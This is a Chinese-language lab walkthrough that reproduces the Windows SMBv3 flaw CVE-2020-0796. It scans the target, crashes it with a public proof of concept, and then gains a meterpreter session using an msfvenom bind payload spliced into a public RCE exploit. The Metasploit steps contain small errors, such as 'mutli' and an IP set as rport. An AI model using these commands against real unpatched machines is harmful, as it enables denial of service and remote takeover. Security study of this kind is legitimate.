一、漏洞介绍
2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。
二、漏洞影响版本
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
只影响 SMB v3.1.1,1903和1909
三、漏洞复现
(1)实验环境
靶机:win10 192.168.3.138
攻击机:kali 192.168.3.128
记得关闭防火墙!
(2)检测漏洞
使用cve-2020-0796漏洞检测工具进行检测
检测当前win10操作系统是否存在漏洞
奇安信检测脚本:
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
使用cmd 运行 检测程序
输入靶机的地址(也可以是ip范围)
进行检测、
靶机存在cve-2020-0796漏洞
(3)漏洞利用
靶机蓝屏
在攻击机kali中下载蓝屏exp
git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git
下载完成后 进入exp目录
使用命令 将setup.py安装
python3 setup.py install
安装完成后
使用CVE-2020-0796.py 进行攻击
python3 CVE-2020-0796.py 192.168.3.138
成功蓝屏
反弹shell
使用msf生成payload
msfvenom -p windows/x64/meterpreter/bind_tcp lport=8888 -f py -o 1111.py
生成文件名为1111.py
下载远程RCE执行exp
地址:https://github.com/chompie1337/SMBGhost_RCE_PoC
将生成的1111.py中的内容复制
替换掉 exploit.py文件中的USER_PAYLOAD参数
并将buf参数替换为USER_PAYLOAD
之后将整个exp文件夹复制到kali中
启动msf
设置payload lport rhost参数的值
msf
use exploit/mutli/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rport 192.168.3.138 //win10的IP地址
run
msf监听8888端口
另起一个会话
运行exploit.py 脚本
python3 exploit.py -ip 192.168.3.138
msf监听到会话
复现成功
四、参考文章
https://blog.csdn.net/weixin_42742658/article/details/120564824